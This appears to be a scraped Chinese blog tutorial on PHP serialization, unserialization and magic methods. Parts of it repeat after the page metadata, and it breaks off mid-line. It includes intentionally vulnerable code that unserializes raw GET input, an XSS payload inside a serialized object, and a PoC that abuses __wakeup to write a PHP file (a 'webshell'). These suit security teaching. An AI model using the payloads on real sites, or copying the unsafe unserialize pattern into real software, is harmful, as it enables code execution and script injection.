\u56db\u3001\u9762\u5411\u5bf9\u8c61<\/h1>\n
\u5c01\u88c5\uff1a
\n\u5c06\u4e00\u4e2a\u7c7b\u8fdb\u884c\u5c01\u88c5\uff0c\u7c7b\u4e2d\u6709\u5c5e\u6027\uff0c\u4ee5\u53ca\u884c\u4e3a\uff08\u6210\u5458\u51fd\u6570\uff09<\/p>\n
\u7ee7\u627f\uff1a
\n\u5b50\u7c7b\u4f1a\u7ee7\u627f\u7236\u7c7b\u7684\u5c5e\u6027\u4ee5\u53ca\u884c\u4e3a<\/p>\n
\u5b9e\u4f8b\u5316\uff1a
\n\u7c7b\u5b9e\u4f8b\u5316\u5c31\u6210\u4e3a\u4e86\u4e00\u4e2a\u5bf9\u8c61\uff0c\u5c31\u662f\u7c7b\u751f\u6210\u4e86\u4e00\u4e2a\u5177\u4f53\u7684\u5b9e\u4f8b<\/p>\n
\u4e94\u3001\u5e8f\u5217\u5316<\/h1>\n<?php\n\/\/\u5b9a\u4e49\u7c7b\nclass Girl{\n\/\/\u58f0\u660e\u5c5e\u6027\n public $name;\n public $age;\n\/\/\u58f0\u660e\u65b9\u6cd5\n\/\/__construct()\u5bf9\u8c61\u521b\u5efa(new)\u65f6\u4f1a\u81ea\u52a8\u8c03\u7528\npublic function __construct($name, $age){\n $this->name = $name;\n $this->age = $age;\n}\npublic function hello(){\n echo "Hello, my boy! \\n";\n echo "My name is $this->name, my age is $this->age !";\n }\n}\n\/\/\u7c7b\u5b9e\u4f8b\u5316\u6210\u4e3a\u5bf9\u8c61\n$ryan = new Girl('\u5c0f\u7f8e','18');\n$str = serialize($ryan);\necho $str;\n?>\n<\/code><\/pre>\n\u8f93\u51fa\u5185\u5bb9\uff1a<\/p>\n
O:4:"Girl":2:{s:4:"name";s:6:"\u5c0f\u7f8e";s:3:"age";s:2:"18";}\n<\/code><\/pre>\n\u683c\u5f0f\u4e3a\uff1a\u7c7b\u578b:\u957f\u5ea6:\u5185\u5bb9<\/code>\uff0c\u5982\uff1aO:4:"Girl"<\/code>
\n\u5e38\u89c1\u7684\u8868\u793a\u7c7b\u578b\u7684\u5b57\u7b26\uff1a<\/p>\nO:\u7c7b\na:\u6570\u7ec4(array)\nb:\u5e03\u5c14(boolean)\ni\u6574\u578b\nS:\u5b57\u7b26\u4e32\nN:Null\nd\uff1adouble\uff0c\u6d6e\u70b9\u578b\n<\/code><\/pre>\n\u516d\u3001\u53cd\u5e8f\u5217\u5316<\/h1>\nO:4:"Girl":2:{s:4:"name";s:6:"\u5c0f\u7f8e";s:3:"age";s:2:"18";}\n<\/code><\/pre>\n<?php\n\/\/\u5b9a\u4e49\u7c7b\nclass Girl{\n\/\/\u58f0\u660e\u5c5e\u6027\n\tpublic $name;\n\tpublic $age;\n\/\/\u58f0\u660e\u65b9\u6cd5\n\/\/__construct()\u5bf9\u8c61\u521b\u5efa(new)\u65f6\u4f1a\u81ea\u52a8\u8c03\u7528\npublic function __construct($name, $age){\n\t$this->name = $name;\n\t$this->age = $age;\n}\npublic function hello(){\n\techo "Hello, my boy! \\n";\n\techo "My name is $this->name, my age is $this->age !";\n\t}\n}\n\/\/\u7c7b\u5b9e\u4f8b\u5316\u6210\u4e3a\u5bf9\u8c61\n\/\/$ryan = new Girl('\u5c0f\u7f8e','18');\n$str = 'O:4:"Girl":2:{s:4:"name";s:6:"\u5c0f\u7f8e";s:3:"age";s:2:"18";}';\n$obj = unserialize($str);\n$obj->hello();\n?>\n<\/code><\/pre>\n\u4e03\u3001\u6848\u4f8b<\/h1>\n<?php\nheader("content-type:text\/html;charset=utf-8");\nshow_source(__FILE__);\nerror_reporting(0);\nclass Girl{\n\u00a0 \u00a0 public $name = '\u5c0f\u7ea2';\n\u00a0 \u00a0 public $age = 18;\n\u00a0 \u00a0 public function __construct($name,$age){\n\u00a0 \u00a0 \u00a0 \u00a0 $this->name = $name;\n\u00a0 \u00a0 \u00a0 \u00a0 $this->age = $age;\n\u00a0 \u00a0 \u00a0 \u00a0 }\n\u00a0 \u00a0 public function hello(){\n\u00a0 \u00a0 echo "Hello,my boy!\\n";\n\u00a0 \u00a0 echo "My name is $this->name, my age is $this->age !";\n\u00a0 \u00a0 }\n}\nif(isset($_GET['str' ])){\n$str = $_GET['str'];\n$object = unserialize($str);\n$object->hello();\n}\n?>\n<\/code><\/pre>\n\u5229\u7528\uff1axss<\/p>\n
O:4:"Girl":2:{s:4:"name";s:29:"<script>alert('xss')<\/script>";s:3:"age";s:2:"18";}\n<\/code><\/pre>\n![\"Pasted](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/03\/Pasted-image-20250323151602.png\")
<\/p>\n
\u516b\u3001\u8bbf\u95ee\u63a7\u5236\u7b26 public\\protected\\private<\/h1>\n<?php\nclass Girl{\n\tpublic $name = '\u5c0f\u7ea2';\n\tprotected $age = 18;\n\tprivate $money = 100.5;\npublic function __construct($name, $age,$money){\n\t$this->name = $name;\n\t$this->age = $age;\n\t$this->money = $money;\n}\npublic function hello(){\n\techo "Hello, my boy! \\n";\n\techo "My name is $this->name, my age is $this->age !";\n\techo "I have $this->money RMB !";\n\t}\n}\n$ryan = new Girl("ryan",20,108.5);\necho serialize($ryan);\n?>\n<\/code><\/pre>\n\u5e8f\u5217\u5316\u540e\uff1a<\/p>\n
O:4:"Girl":3:{s:4:"name";s:4:"ryan";s:6:"*age";i:20;s:11:"Girlmoney";d:108.5;}\n<\/code><\/pre>\n\u5bf9\u8c61\u5b57\u6bb5\u540d\u7684\u5e8f\u5217\u5316\u89c4\u5219\uff1a<\/p>\n
\n- \n
var\u548cpublic\uff1avar\u548cpublic\u58f0\u660e\u7684\u5b57\u6bb5\u90fd\u662f\u516c\u5171\u5b57\u6bb5\uff0c\u56e0\u6b64\u4eec\u7684\u5b57\u6bb5\u540d\u7684\u5e8f\u5217\u5316\u683c\u5f0f\u662f\u76f8\u540c\u7684\uff0c\u5e8f\u5217\u5316\u540e\u7684\u5b57\u6bb5\u540d\u4e2d\u4e0d\u5305\u62ec\u58f0\u660e\u65f6\u7684\u53d8\u91cf\u524d\u7f00\u7b26\u53f7<\/p>\n<\/li>\n
- \n
protected\uff1a\u58f0\u660e\u7684\u5b57\u6bb5\u4e3a\u4fdd\u62a4\u5b57\u6bb5\uff0c\u5728\u6240\u58f0\u660e\u7684\u7c7b\u548c\u8be5\u7c7b\u7684\u5b50\u7c7b\u4e2d\u53ef\u89c1\uff0c\u4f46\u5728\u8be5\u7c7b\u7684\u5bf9\u8c61\u5b9e\u4f8b\u4e2d\u4e0d\u53ef\u89c1\u3002\u5728\u5e8f\u5217\u5316\u65f6\uff0c\u5b57\u6bb5\u540d\u524d\u9762\u4f1a\u52a0\u4e0a\\0*\\0\uff08\\0\u4e3a\u4e0d\u53ef\u89c1\u5b57\u7b26\uff09\u7684\u524d\u7f00\uff0c\u56e0\u6b64\u8be5\u5b57\u6bb5\u7684\u957f\u5ea6\u4f1a\u6bd4\u53ef\u89c1\u5b57\u7b26\u957f\u5ea6\u59273\u3002<\/p>\n<\/li>\n
- \n
private\uff1a\u58f0\u660e\u7684\u5b57\u6bb5\u4e3a\u79c1\u6709\u5b57\u6bb5\uff0c\u53ea\u6709\u5728\u6240\u58f0\u660e\u7684\u7c7b\u4e2d\u53ef\u89c1\u3002\u540d\u5728\u5e8f\u5217\u5316\u65f6\uff0c\u5b57\u6bb5\u540d\u524d\u9762\u4f1a\u52a0\u4e0a\\0<\u58f0\u660e\u8be5\u79c1\u6709\u5b57\u6bb5\u7684\u7c7b\u7684\u7c7b\u540d>\\0<\/code>\u524d\u7f00<\/p>\n<\/li>\n<\/ul>\n\u4e5d\u3001\u8bbf\u95ee\u63a7\u5236\u7b26\u7684\u53cd\u5e8f\u5217\u5316<\/h1>\n<?php\nclass Girl{\n\u00a0 \u00a0 public $name = '\u5c0f\u7ea2';\n\u00a0 protected $age = 18;\n\u00a0 \u00a0 private $money = 100.5;\npublic function __construct($name, $age,$money){\n\u00a0 \u00a0 $this->name = $name;\n\u00a0 \u00a0 $this->age = $age;\n\u00a0 \u00a0 $this->money = $money;\n}\npublic function hello(){\n\u00a0 \u00a0 echo "Hello, my boy! \\n";\n\u00a0 \u00a0 echo "My name is $this->name, my age is $this->age !";\n\u00a0 \u00a0 echo "I have $this->money RMB !";\n\u00a0 \u00a0 }\n}\n$str = 'O:4:"Girl":3:{s:4:"name";s:4:"ryan";S:6:"\\00*\\00age";i:20;S:11:"\\00Girl\\00money";d:108.5;}';\n$o = unserialize($str);\n$o->hello();\n?>\n<\/code><\/pre>\nO:4:"Girl":3:{s:4:"name";s:4:"ryan";S:6:"\\00*\\00age";i:20;S:11:"\\00Girl\\00money";d:108.5;}\n<\/code><\/pre>\n\u6ce8\u610f\uff1a \u8981\u5c06\u5c0f\u5199\u7684s\u6539\u4e3a\u5927\u5199\u7684S\uff0c\\00\u66ff\u4ee3\u7a7a\u5b57\u7b26
\n![\"Pasted](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/03\/Pasted-image-20250323155250.png\")
<\/p>\n
\u5341\u3001\u9b54\u672f\u65b9\u6cd5<\/h1>\n
\u9b54\u672f\u65b9\u6cd5\u662f\u4e00\u79cd\u7279\u6b8a\u7684\u65b9\u6cd5\uff0c\u5728\u67d0\u4e9b\u60c5\u51b5\u4e0b\u4f1a\u81ea\u52a8\u8c03\u7528\u3002\u9b54\u672f\u65b9\u6cd5\u7684\u547d\u540d\u662f\u4ee5\u4e24\u4e2a\u4e0b\u5212\u7ebf\u5f00\u5934\u7684\uff0c\u5e38\u89c1\u7684\u9b54\u672f\u65b9\u6cd5\u6709\uff1a<\/p>\n
__construct() \u5bf9\u8c61\u521b\u5efa(new)\u65f6\u4f1a\u81ea\u52a8\u8c03\u7528\n__destruct() \u5bf9\u8c61\u88ab\u9500\u6bc1\u65f6\u89e6\u53d1\n__tostring() \u628a\u5bf9\u8c61\u5f53\u4f5c\u5b57\u7b26\u4e32\u4f7f\u7528\u65f6\u89e6\u53d1\n__wakeup() \u4f7f\u7528unserialize\u65f6\u89e6\u53d1\n__sleep() \u4f7f\u7528serialize\u65f6\u89e6\u53d1\n__call() \u5728\u5bf9\u8c61\u4e0a\u4e0b\u6587\u4e2d\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u7684\u65b9\u6cd5\u65f6\u89e6\u53d1\n__callStatic() \u5728\u9759\u6001\u4e0a\u4e0b\u6587\u4e2d\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u7684\u65b9\u6cd5\u65f6\u89e6\u53d1\n__get($key) \u7528\u4e8e\u4ece\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u8bfb\u53d6\u6570\u636e,$key\u5c31\u662f\u4e0d\u5b58\u5728\u7684\u5c5e\u6027\n__set() \u7528\u4e8e\u5c06\u6570\u636e\u5199\u5165\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\n__isset() \u5728\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e0a\u8c03\u7528isset()\u6216empty()\u89e6\u53d1\n__unset() \u5728\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e0a\u4f7f\u7528unset()\u65f6\u89e6\u53d1\n__clone() \u5f53\u514b\u9686\u5bf9\u8c61\u662f\u8c03\u7528\n__invoke() \u5f53\u811a\u672c\u5c1d\u8bd5\u5c06\u5bf9\u8c61\u8c03\u7528\u4e3a\u51fd\u6570\u65f6\u89e6\u53d1\n__autoload() \u5728\u4ee3\u7801\u4e2d\u5f53\u8c03\u7528\u4e0d\u5b58\u5728\u7684\u7c7b\u65f6\u4f1a\u81ea\u52a8\u8c03\u7528\u8be5\u65b9\u6cd5\n<\/code><\/pre>\n\u6848\u4f8b1.\uff1a<\/h2>\n<?php\nheader(header:"content-type:text\/html;charset=utf-8") ;\nclass Girl{\n\tpublic $name = "\u5c0f\u82b1";\n\tpublic function __construct($name){\n\t\t$this->name = $name;\n\t\techo "__construct: \u521b\u5efa\u5bf9\u8c61\u65f6\uff0ccreate object:$this->name \\n";\n\t}\n\tpublic function __destruct(){\n\t\techo "__destruct\uff1a\u5bf9\u8c61\u9500\u6bc1\u65f6\uff0c$this->name is died \uff01\\n";\n\t}\n\tpublic function __call($name, $arguments){\n\t\techo"__caLL\uff1a\u8c03\u7528\u4e0d\u5b58\u5728\u7684\u65b9\u6cd5\u65f6\\n";\n\t}\n\tpublic function __toString(){\n\t\treturn "__toString\uff1a\u628a\u5bf9\u8c61\u5f53\u505a\u5b57\u7b26\u4e32\u8f93\u51fa\u65f6 \\n";\n\t}\n\tpublic function __clone(){\n\t\techo "__clone\uff1a\u514b\u9686\u5bf9\u8c61\u65f6 \\n";\n\t}\n\tpublic function __get($name){\n\t\techo "__get\uff1a\u8bfb\u53d6\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684\u5c5e\u6027\u65f6 \\n";\n\t}\n\tpublic function _set($name,$value){\n\t\techo "__set\uff1a\u8bbe\u7f6e\u4e0d\u5b58\u5728\u7684\u5c5e\u6027 \\n";\n\t}\n\tpublic function __isset($name){\n\t\techo "__isset\uff1a\u5bf9\u4e0d\u53ef\u8bbf\u95ee\u5c5e\u6027\u8c03\u7528isset\uff08\uff09 \\n";\n\t}\n\tpublic function _unset($name){\n\t\techo "__unset\uff1a\u5728\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e0a\u4f7f\u7528unset\uff08\uff09\\n";\n\t}\n\tpublic function hello(){\n\t\techo "My name is $this->name !\\n";\n\t}\n}\n$ryan = new Girl("Ryan");\n$ryan->hello();\n$ryan->a();\n$ryan->b;\n$r2 = clone $ryan;\necho $ryan;\n$r2->name = "zs";\n$r2->abc ="zs";\nisset($r2->abc);\nunset($r2->a);\n?>\n<\/code><\/pre>\n![\"Pasted](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/03\/Pasted-image-20250323182044.png\")
<\/p>\n
\u6848\u4f8b2.\uff1a<\/h2>\n<?php\nheader("content-type:text\/html;charset=utf-8");\nclass Girl{\n\tpublic $name = "\u5c0f\u82b1";\n\tpublic function __construct($name){\n\t\t$this->name = $name;\n\t\techo "__construct\uff1a \u521b\u5efa\u5bf9\u8c61\u65f6\uff0c create object:$this->name \\n";\n\t}\n\tpublic function __sleep(){\n\t\techo "__sleep\uff1a\u5e8f\u5217\u5316\u65f6\u8c03\u7528\\n";\n\t\treturn array('name');\n\t}\n\tpublic function __wakeup(){\n\t\techo "__wakeup\uff1a\u53cd\u5e8f\u5217\u5316\u65f6\u8c03\u7528\\n";\n\t}\n}\n$ryan = new Girl("Ryan");\n$r = serialize($ryan);\necho $r;\n$str ='O:4:"Girl":1:{s:4:"name";s:4:"Ryan";}';\necho "\\n";\nunserialize($str);\n?>\n<\/code><\/pre>\n![\"Pasted](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/03\/Pasted-image-20250323183525.png\")
<\/p>\n
\u6848\u4f8b3.\uff1a<\/h2>\n<?php\nheader("content-type:text\/html;charset=utf-8");\nhighlight_file(__FILE__);\nclass Girl{\n\tpublic $name = "\u5c0f\u660e";\n\tpublic $file = "a.txt";\n\tfunction __wakeup(){\n\t\t\t$file = fopen($this->file,'w');\n\t\t\tfwrite($file, $this->name);\n\t\t\tfclose($file);\n\t}\n}\necho "<h1>\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u6848\u4f8b<\/h1>";\nif(isset($_GET["str"])){\n\t$str = $_GET['str'];\n\t$o = unserialize($str);\n\techo "name:".$o->name;\n}\n?>\n<\/code><\/pre>\npoc\u5199\u5165webshell:<\/p>\n
O:4:"Girl":2:{s:4:"name";s:18:"<?php phpinfo();?>";s:4:"file";s:5:"a.php";}\n<\/code><\/pre>\n\u6267\u884cpoc\uff1a
\n![\"Pasted](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/03\/Pasted-image-20250323175004.png\")
<\/p>\n
\u8bbf\u95eea.php\u6587\u4ef6\uff1a
\n
![\"Pasted](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div>
\n\u6210\u529f\u5199\u5165<\/p>\n","protected":false},"excerpt":{"rendered":"\u4e00\u3001\u5e8f\u5217\u5316\/\u53cd\u5e8f\u5217\u5316\u6280\u672f \u5e8f\u5217\u5316\uff1a\u5c06\u5bf9\u8c61\u8f6c\u4e3a\u5b57\u8282\u6d41\uff0c\u76ee\u7684\u662f\u65b9\u4fbf\u5bf9\u8c61\u5728\u5185\u5b58\u3001\u6587\u4ef6\u3001\u6570\u636e\u5e93\u6216\u8005\u7f51\u7edc\u4e4b\u95f4\u7684\u4f20\u9012 \u53cd\u5e8f […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,21],"tags":[],"class_list":["post-2144","post","type-post","status-publish","format-standard","hentry","category-web","category-21"],"_links":{"self":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2144","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/comments?post=2144"}],"version-history":[{"count":1,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2144\/revisions"}],"predecessor-version":[{"id":2145,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2144\/revisions\/2145"}],"wp:attachment":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/media?parent=2144"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/categories?post=2144"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/tags?post=2144"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
<?php\n\/\/\u5b9a\u4e49\u7c7b\nclass Girl{\n\/\/\u58f0\u660e\u5c5e\u6027\n public $name;\n public $age;\n\/\/\u58f0\u660e\u65b9\u6cd5\n\/\/__construct()\u5bf9\u8c61\u521b\u5efa(new)\u65f6\u4f1a\u81ea\u52a8\u8c03\u7528\npublic function __construct($name, $age){\n $this->name = $name;\n $this->age = $age;\n}\npublic function hello(){\n echo "Hello, my boy! \\n";\n echo "My name is $this->name, my age is $this->age !";\n }\n}\n\/\/\u7c7b\u5b9e\u4f8b\u5316\u6210\u4e3a\u5bf9\u8c61\n$ryan = new Girl('\u5c0f\u7f8e','18');\n$str = serialize($ryan);\necho $str;\n?>\n<\/code><\/pre>\n\u8f93\u51fa\u5185\u5bb9\uff1a<\/p>\n
O:4:"Girl":2:{s:4:"name";s:6:"\u5c0f\u7f8e";s:3:"age";s:2:"18";}\n<\/code><\/pre>\n\u683c\u5f0f\u4e3a\uff1a\u7c7b\u578b:\u957f\u5ea6:\u5185\u5bb9<\/code>\uff0c\u5982\uff1aO:4:"Girl"<\/code>
\n\u5e38\u89c1\u7684\u8868\u793a\u7c7b\u578b\u7684\u5b57\u7b26\uff1a<\/p>\nO:\u7c7b\na:\u6570\u7ec4(array)\nb:\u5e03\u5c14(boolean)\ni\u6574\u578b\nS:\u5b57\u7b26\u4e32\nN:Null\nd\uff1adouble\uff0c\u6d6e\u70b9\u578b\n<\/code><\/pre>\n\u516d\u3001\u53cd\u5e8f\u5217\u5316<\/h1>\nO:4:"Girl":2:{s:4:"name";s:6:"\u5c0f\u7f8e";s:3:"age";s:2:"18";}\n<\/code><\/pre>\n<?php\n\/\/\u5b9a\u4e49\u7c7b\nclass Girl{\n\/\/\u58f0\u660e\u5c5e\u6027\n\tpublic $name;\n\tpublic $age;\n\/\/\u58f0\u660e\u65b9\u6cd5\n\/\/__construct()\u5bf9\u8c61\u521b\u5efa(new)\u65f6\u4f1a\u81ea\u52a8\u8c03\u7528\npublic function __construct($name, $age){\n\t$this->name = $name;\n\t$this->age = $age;\n}\npublic function hello(){\n\techo "Hello, my boy! \\n";\n\techo "My name is $this->name, my age is $this->age !";\n\t}\n}\n\/\/\u7c7b\u5b9e\u4f8b\u5316\u6210\u4e3a\u5bf9\u8c61\n\/\/$ryan = new Girl('\u5c0f\u7f8e','18');\n$str = 'O:4:"Girl":2:{s:4:"name";s:6:"\u5c0f\u7f8e";s:3:"age";s:2:"18";}';\n$obj = unserialize($str);\n$obj->hello();\n?>\n<\/code><\/pre>\n\u4e03\u3001\u6848\u4f8b<\/h1>\n<?php\nheader("content-type:text\/html;charset=utf-8");\nshow_source(__FILE__);\nerror_reporting(0);\nclass Girl{\n\u00a0 \u00a0 public $name = '\u5c0f\u7ea2';\n\u00a0 \u00a0 public $age = 18;\n\u00a0 \u00a0 public function __construct($name,$age){\n\u00a0 \u00a0 \u00a0 \u00a0 $this->name = $name;\n\u00a0 \u00a0 \u00a0 \u00a0 $this->age = $age;\n\u00a0 \u00a0 \u00a0 \u00a0 }\n\u00a0 \u00a0 public function hello(){\n\u00a0 \u00a0 echo "Hello,my boy!\\n";\n\u00a0 \u00a0 echo "My name is $this->name, my age is $this->age !";\n\u00a0 \u00a0 }\n}\nif(isset($_GET['str' ])){\n$str = $_GET['str'];\n$object = unserialize($str);\n$object->hello();\n}\n?>\n<\/code><\/pre>\n\u5229\u7528\uff1axss<\/p>\n
O:4:"Girl":2:{s:4:"name";s:29:"<script>alert('xss')<\/script>";s:3:"age";s:2:"18";}\n<\/code><\/pre>\n<\/p>\n
\u516b\u3001\u8bbf\u95ee\u63a7\u5236\u7b26 public\\protected\\private<\/h1>\n<?php\nclass Girl{\n\tpublic $name = '\u5c0f\u7ea2';\n\tprotected $age = 18;\n\tprivate $money = 100.5;\npublic function __construct($name, $age,$money){\n\t$this->name = $name;\n\t$this->age = $age;\n\t$this->money = $money;\n}\npublic function hello(){\n\techo "Hello, my boy! \\n";\n\techo "My name is $this->name, my age is $this->age !";\n\techo "I have $this->money RMB !";\n\t}\n}\n$ryan = new Girl("ryan",20,108.5);\necho serialize($ryan);\n?>\n<\/code><\/pre>\n\u5e8f\u5217\u5316\u540e\uff1a<\/p>\n
O:4:"Girl":3:{s:4:"name";s:4:"ryan";s:6:"*age";i:20;s:11:"Girlmoney";d:108.5;}\n<\/code><\/pre>\n\u5bf9\u8c61\u5b57\u6bb5\u540d\u7684\u5e8f\u5217\u5316\u89c4\u5219\uff1a<\/p>\n
\n- \n
var\u548cpublic\uff1avar\u548cpublic\u58f0\u660e\u7684\u5b57\u6bb5\u90fd\u662f\u516c\u5171\u5b57\u6bb5\uff0c\u56e0\u6b64\u4eec\u7684\u5b57\u6bb5\u540d\u7684\u5e8f\u5217\u5316\u683c\u5f0f\u662f\u76f8\u540c\u7684\uff0c\u5e8f\u5217\u5316\u540e\u7684\u5b57\u6bb5\u540d\u4e2d\u4e0d\u5305\u62ec\u58f0\u660e\u65f6\u7684\u53d8\u91cf\u524d\u7f00\u7b26\u53f7<\/p>\n<\/li>\n
- \n
protected\uff1a\u58f0\u660e\u7684\u5b57\u6bb5\u4e3a\u4fdd\u62a4\u5b57\u6bb5\uff0c\u5728\u6240\u58f0\u660e\u7684\u7c7b\u548c\u8be5\u7c7b\u7684\u5b50\u7c7b\u4e2d\u53ef\u89c1\uff0c\u4f46\u5728\u8be5\u7c7b\u7684\u5bf9\u8c61\u5b9e\u4f8b\u4e2d\u4e0d\u53ef\u89c1\u3002\u5728\u5e8f\u5217\u5316\u65f6\uff0c\u5b57\u6bb5\u540d\u524d\u9762\u4f1a\u52a0\u4e0a\\0*\\0\uff08\\0\u4e3a\u4e0d\u53ef\u89c1\u5b57\u7b26\uff09\u7684\u524d\u7f00\uff0c\u56e0\u6b64\u8be5\u5b57\u6bb5\u7684\u957f\u5ea6\u4f1a\u6bd4\u53ef\u89c1\u5b57\u7b26\u957f\u5ea6\u59273\u3002<\/p>\n<\/li>\n
- \n
private\uff1a\u58f0\u660e\u7684\u5b57\u6bb5\u4e3a\u79c1\u6709\u5b57\u6bb5\uff0c\u53ea\u6709\u5728\u6240\u58f0\u660e\u7684\u7c7b\u4e2d\u53ef\u89c1\u3002\u540d\u5728\u5e8f\u5217\u5316\u65f6\uff0c\u5b57\u6bb5\u540d\u524d\u9762\u4f1a\u52a0\u4e0a\\0<\u58f0\u660e\u8be5\u79c1\u6709\u5b57\u6bb5\u7684\u7c7b\u7684\u7c7b\u540d>\\0<\/code>\u524d\u7f00<\/p>\n<\/li>\n<\/ul>\n\u4e5d\u3001\u8bbf\u95ee\u63a7\u5236\u7b26\u7684\u53cd\u5e8f\u5217\u5316<\/h1>\n<?php\nclass Girl{\n\u00a0 \u00a0 public $name = '\u5c0f\u7ea2';\n\u00a0 protected $age = 18;\n\u00a0 \u00a0 private $money = 100.5;\npublic function __construct($name, $age,$money){\n\u00a0 \u00a0 $this->name = $name;\n\u00a0 \u00a0 $this->age = $age;\n\u00a0 \u00a0 $this->money = $money;\n}\npublic function hello(){\n\u00a0 \u00a0 echo "Hello, my boy! \\n";\n\u00a0 \u00a0 echo "My name is $this->name, my age is $this->age !";\n\u00a0 \u00a0 echo "I have $this->money RMB !";\n\u00a0 \u00a0 }\n}\n$str = 'O:4:"Girl":3:{s:4:"name";s:4:"ryan";S:6:"\\00*\\00age";i:20;S:11:"\\00Girl\\00money";d:108.5;}';\n$o = unserialize($str);\n$o->hello();\n?>\n<\/code><\/pre>\nO:4:"Girl":3:{s:4:"name";s:4:"ryan";S:6:"\\00*\\00age";i:20;S:11:"\\00Girl\\00money";d:108.5;}\n<\/code><\/pre>\n\u6ce8\u610f\uff1a \u8981\u5c06\u5c0f\u5199\u7684s\u6539\u4e3a\u5927\u5199\u7684S\uff0c\\00\u66ff\u4ee3\u7a7a\u5b57\u7b26
\n<\/p>\n
\u5341\u3001\u9b54\u672f\u65b9\u6cd5<\/h1>\n
\u9b54\u672f\u65b9\u6cd5\u662f\u4e00\u79cd\u7279\u6b8a\u7684\u65b9\u6cd5\uff0c\u5728\u67d0\u4e9b\u60c5\u51b5\u4e0b\u4f1a\u81ea\u52a8\u8c03\u7528\u3002\u9b54\u672f\u65b9\u6cd5\u7684\u547d\u540d\u662f\u4ee5\u4e24\u4e2a\u4e0b\u5212\u7ebf\u5f00\u5934\u7684\uff0c\u5e38\u89c1\u7684\u9b54\u672f\u65b9\u6cd5\u6709\uff1a<\/p>\n
__construct() \u5bf9\u8c61\u521b\u5efa(new)\u65f6\u4f1a\u81ea\u52a8\u8c03\u7528\n__destruct() \u5bf9\u8c61\u88ab\u9500\u6bc1\u65f6\u89e6\u53d1\n__tostring() \u628a\u5bf9\u8c61\u5f53\u4f5c\u5b57\u7b26\u4e32\u4f7f\u7528\u65f6\u89e6\u53d1\n__wakeup() \u4f7f\u7528unserialize\u65f6\u89e6\u53d1\n__sleep() \u4f7f\u7528serialize\u65f6\u89e6\u53d1\n__call() \u5728\u5bf9\u8c61\u4e0a\u4e0b\u6587\u4e2d\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u7684\u65b9\u6cd5\u65f6\u89e6\u53d1\n__callStatic() \u5728\u9759\u6001\u4e0a\u4e0b\u6587\u4e2d\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u7684\u65b9\u6cd5\u65f6\u89e6\u53d1\n__get($key) \u7528\u4e8e\u4ece\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u8bfb\u53d6\u6570\u636e,$key\u5c31\u662f\u4e0d\u5b58\u5728\u7684\u5c5e\u6027\n__set() \u7528\u4e8e\u5c06\u6570\u636e\u5199\u5165\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\n__isset() \u5728\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e0a\u8c03\u7528isset()\u6216empty()\u89e6\u53d1\n__unset() \u5728\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e0a\u4f7f\u7528unset()\u65f6\u89e6\u53d1\n__clone() \u5f53\u514b\u9686\u5bf9\u8c61\u662f\u8c03\u7528\n__invoke() \u5f53\u811a\u672c\u5c1d\u8bd5\u5c06\u5bf9\u8c61\u8c03\u7528\u4e3a\u51fd\u6570\u65f6\u89e6\u53d1\n__autoload() \u5728\u4ee3\u7801\u4e2d\u5f53\u8c03\u7528\u4e0d\u5b58\u5728\u7684\u7c7b\u65f6\u4f1a\u81ea\u52a8\u8c03\u7528\u8be5\u65b9\u6cd5\n<\/code><\/pre>\n\u6848\u4f8b1.\uff1a<\/h2>\n<?php\nheader(header:"content-type:text\/html;charset=utf-8") ;\nclass Girl{\n\tpublic $name = "\u5c0f\u82b1";\n\tpublic function __construct($name){\n\t\t$this->name = $name;\n\t\techo "__construct: \u521b\u5efa\u5bf9\u8c61\u65f6\uff0ccreate object:$this->name \\n";\n\t}\n\tpublic function __destruct(){\n\t\techo "__destruct\uff1a\u5bf9\u8c61\u9500\u6bc1\u65f6\uff0c$this->name is died 